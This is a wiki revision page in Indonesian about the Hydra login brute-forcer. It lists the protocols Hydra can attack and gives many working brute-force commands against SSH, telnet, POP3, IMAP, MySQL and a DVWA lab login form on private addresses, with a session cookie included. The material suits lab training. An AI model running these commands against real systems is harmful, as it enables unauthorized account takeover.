Difference between revisions of "Hydra"

From OnnoWiki
Jump to navigation Jump to search
Line 35: Line 35:
  
 
  hydra -V -l admin -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"
 
  hydra -V -l admin -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"
 +
 +
hydra -L userdvwa.txt -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"
 +
  
 
  hydra -V -l admin -p password "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"
 
  hydra -V -l admin -p password "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"
  
  
'''BISA di COBA, bisa error'''
+
'''BISA di COBA, bisa ERROR'''
  
 
  hydra 192.168.0.102 -l admin -P /usr/share/set/src/fasttrack/wordlist.txt http-get-form "DVWA-1.9/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=Low;PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63"
 
  hydra 192.168.0.102 -l admin -P /usr/share/set/src/fasttrack/wordlist.txt http-get-form "DVWA-1.9/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=Low;PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63"

Revision as of 07:25, 19 February 2020

Hydra adalah network log yang sangat terkenal dan dihormati oleh cracker yang dapat mendukung layanan yang berbeda.


System yang di serang

Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird,
FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD,
HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP,
Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3,
POSTGRES, RDP, Rexec, Rlogin, Rsh, S7-300, SAP/R3, SIP, SMB, SMTP,
SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion,
Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Contoh

hydra -L userlist.txt -P password.txt namaprotocol://mesin-korban
hydra -L userlist.txt -P passwordlist.txt ssh://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f ssh://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f telnet://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f pop3://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f imap://192.168.0.80
hydra -L userlist.txt -P passwordlist.txt -e ns -u -f 192.168.0.80 mysql
hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 mysql
hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 telnet
hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 ssh

Untuk DVWA (HTTP-POST-FORM)

hydra -L <USER> -P <Password> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>”


OK

hydra -V -l admin -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"
hydra -L userdvwa.txt -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"


hydra -V -l admin -p password "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"


BISA di COBA, bisa ERROR

hydra 192.168.0.102 -l admin -P /usr/share/set/src/fasttrack/wordlist.txt http-get-form "DVWA-1.9/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=Low;PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63"
hydra 192.168.0.102 -l admin -P testpassword http-get-form "/DVWA-1.9/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security;low;PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63"
hydra -V -l smithy -P /usr/share/set/src/fasttrack/wordlist.txt "http-get-form://192.168.0.102/DVWA-1.9/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=b9pqgpmf5ma43g964qkkb9cc63; security=low"

Referensi

General usage and options

HTTP basic auth

HTTP form based auth

Multiple protocols

Telnet